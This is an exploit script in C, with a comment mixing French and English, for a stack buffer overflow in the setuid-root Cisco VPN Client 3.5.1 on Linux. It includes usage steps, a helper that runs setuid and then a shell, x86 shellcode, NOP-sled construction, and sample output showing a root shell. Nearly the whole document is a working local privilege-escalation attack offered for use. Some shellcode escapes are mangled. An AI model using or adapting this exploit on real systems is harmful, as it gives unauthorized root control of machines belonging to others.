Exploit:
/* Dépassement de tampon pour le client VPN de Cisco pour Linux
testé sur la dernière version : vpnclient-linux-3.5.1.Rel-k9.tar.gz

Pour une utilisation correcte, vous deveez mettre ce code dans un
xx.c, le compilé (en tant que xx), et placé l’executable dans /tmp (afin de passer
les restrictions PAM)

#include <stdio.h>
main() {
setuid(0);
execl("/bin/sh", "sh", NULL);
}

then compile this and run it. syntax is ./vpnclient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)

greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;

when you get a chance, check out http://sec.angrypacket.com
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"x31xc0x31xdbxb0x17xcdx80"
"x31xc0x50x68x2fx2fx78x78"
"x68x2fx74x6dx70x89xe3x31"
"xc0x50x89xe2x54x89xe1xb0"
"x0bxcdx80x00";

unsigned long get_sp (void) {
__asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {

int i, offset=0;
long addr;
char *buf, *ptr;

if(argc > 1) offset = atoi(argv[1]);

buf = (char *)malloc(sizeof(char) * LEN);
bzero(buf, LEN);
addr = get_sp() - offset;
printf("addr: 0x%x, offset: %d ", addr, offset);

for(i = 0; i < LEN; i += 4) {
*(long *)&buf[i] = addr;
}

for(i = 0; i < (LEN / 2); i++) {
*(buf + i) = NOP;
}

ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
for(i = 0; i < strlen(shell); i++) {
*(ptr++) = shell[i];
}
buf[LEN - 1] = '';

execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
return(0);

}